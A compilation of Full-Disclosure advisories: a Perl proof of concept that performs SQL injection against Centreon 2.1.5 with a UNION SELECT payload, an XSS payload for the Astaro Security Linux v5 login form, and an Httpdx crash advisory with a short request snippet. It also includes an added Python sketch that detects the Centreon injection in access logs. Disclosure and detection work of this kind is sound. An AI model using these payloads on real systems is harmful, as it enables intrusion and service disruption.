[Full-disclosure] Vulnerability Centreon IT & Network Monitoring v2.1.5
#!/usr/bin/perl
# //[PoC]-//
#
# Title : Centreon IT & Network Monitoring v2.1.5 - Injection SQL
# Version : 2.1.5
# Author : Jonathan Salwan (j.sal...@sysdream.com)
#
#
# [Vuln sql injection]
# http://localhost/centreon/main.php?p=201&host_id=-1%20[SQL Injection]&o=p&min=1
#
# http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1
#
#
# //---[Credit]---//
#
# http://www.sysdream.com/article.php?story_id=328&section_id=78
# http://www.shell-storm.org
#

use LWP::UserAgent;

my $url   = 'http://localhost/centreon/index.php';
my $login = 'login';
my $paswd = 'pwd';
my $sql   = 'http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1';

my $ua = LWP::UserAgent->new;

# Fetch the login page to obtain a session cookie
my $response = $ua->get($url);
my $cook = $response->header('Set-Cookie');

# Authenticate with that session
my $req2 = $ua->post($url,
    {useralias => $login, password => $paswd, submit => 'login'},
    Cookie => $cook,
    'Content-Type' => 'application/x-www-form-urlencoded'
);

# Request the page with the crafted host_id and save the response
$response = $ua->get($sql, Cookie => $cook);
my $content = $response->content();

open(FILE, '>sql-centreon.txt');
print FILE $content;
close(FILE);

print "\n[Answer SQL Injection]\n\n";
my $selection = system('cat sql-centreon.txt | grep ">Host"');
unlink('sql-centreon.txt');
print "\n";

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
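A detection sketch for the host_id injection described in the advisory above, added here as an example and not part of the original post or of Centreon: it scans web-server access logs for main.php requests whose decoded host_id is not a plain integer. The log lines are constructed, and treating a legitimate host_id as an unsigned integer is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2009:10:00:01 +0200] "GET /centreon/main.php?p=201&host_id=14&o=p&min=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jun/2009:10:00:07 +0200] "GET /centreon/main.php?p=201&host_id=-1%20UNION%20SELECT%201,@@version,3,4,5&o=p&min=1 HTTP/1.1" 200 4875
10.0.0.9 - - [01/Jun/2009:10:00:09 +0200] "GET /centreon/main.php?p=201&host_id=-1+union+select+1,2,3,4,5&o=p&min=1 HTTP/1.1" 200 4870
10.0.0.5 - - [01/Jun/2009:10:00:12 +0200] "GET /centreon/index.php HTTP/1.1" 200 2310
"""

REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
NUMERIC_ID = re.compile(r"\d+")  # assumption: a legitimate host_id is an unsigned integer


def suspicious_host_id(line):
    """Return (client, decoded host_id) when a main.php request carries a non-numeric host_id."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/main.php"):
        return None
    # parse_qs percent-decodes each value and turns '+' into a space,
    # so encoded and plain variants of the same payload compare equal.
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("host_id", []):
        if not NUMERIC_ID.fullmatch(value.strip()):
            return m.group("client"), value
    return None


def scan(log_text):
    """Return every (client, host_id) hit found in a block of log text."""
    hits = (suspicious_host_id(line) for line in log_text.splitlines())
    return [hit for hit in hits if hit]


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}: host_id={value!r}")
```

Checking the decoded value against an allow-list pattern catches encoding variants that a keyword match on the raw log line would miss.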
[Full-disclosure] Vulnerability Astaro Security Linux v5
Program : Astaro Security Linux v5
PoC : XSS
Homepage : http://www.astaro.com/
Found by : Vincent Hautot
Contact : v.hautot () sysdream com

//- Application description
Astaro Security Linux is a complete network security solution that protects organizations against a wide range of threats to security and productivity.

//- Description of vulnerability
This XSS was found on the index.fpl page in the login form. Using this flaw it is possible to execute Javascript code.
Posting using multipart/form-data does not work; use this data instead:

username...@fucking.mail&password=DTC&SID=>">alert("XSS !!!") &cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0

//- Credits
http://www.sysdream.com/article.php?story_id=326&section_id=78
[Full-disclosure] Vulnerability Httpdx v1.5.3b
Program : Httpdx v1.5.3b
PoC : Remote Crash Service (if http.log=1)
Homepage : http://sourceforge.net/projects/httpdx/
Found by : Jonathan Salwan
This Advisory: Jonathan Salwan
Contact : j.sal...@sysdream.com

//- Application description
Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc. All settings in one config/script file.

//- Description of vulnerability
The vulnerability is caused by setting http.log=1 in httpdx.conf - error writing log.
This can be exploited to crash all services, http & ftp. Use a simple GET request to crash the service.

//- Credits
http://www.sysdream.com/article.php?story_id=325&section_id=78
http://www.shell-storm.org

import urllib
import urllib2

url = 'http://172.16.240.128/'
req = urllib2.Request(url)
answer = urllib2.urlopen(req)
page = answer.read()